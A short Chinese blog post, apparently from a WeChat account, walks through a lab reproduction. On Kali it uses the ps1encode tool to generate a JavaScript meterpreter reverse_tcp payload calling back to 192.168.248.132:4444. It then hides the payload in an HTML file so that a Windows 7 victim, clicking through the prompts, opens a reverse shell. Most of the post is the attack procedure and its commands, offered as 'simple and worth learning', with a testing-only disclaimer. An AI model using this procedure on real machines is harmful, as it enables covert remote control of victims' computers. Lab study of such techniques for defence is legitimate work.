前言
本篇文章是按照大佬的文章复现
本文只用于测试,请不要将其用于非法途径
公众号: 洛米唯熊
环境
- 攻击: kali
ip: 192.168.248.132 - 测试: windows 7 x64
ip: 192.168.248.136
工具地址
https://github.com/CroweCybersecurity/ps1encode
克隆
在kali克隆工具
命令:git clone https://github.com/CroweCybersecurity/ps1encode.git
生成js脚本
命令:./pslencode.rb --LHOST 192.168.248.132 --LPORT 4444 --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t js
复制文本放到文件中生成1.js文件
监听端口反弹shell
windows执行文件
直接执行的话可能比较明显,所以参照文章我们写了一个1.html文件
执行1.html文件,选择运行->允许阻止内容->选择是,就反弹成功了
获取shell
复现完成,过程简单,值得一学
持续更新Android安全、web安全等原创文章,需要学习资料,技术交流可以关注我一起学习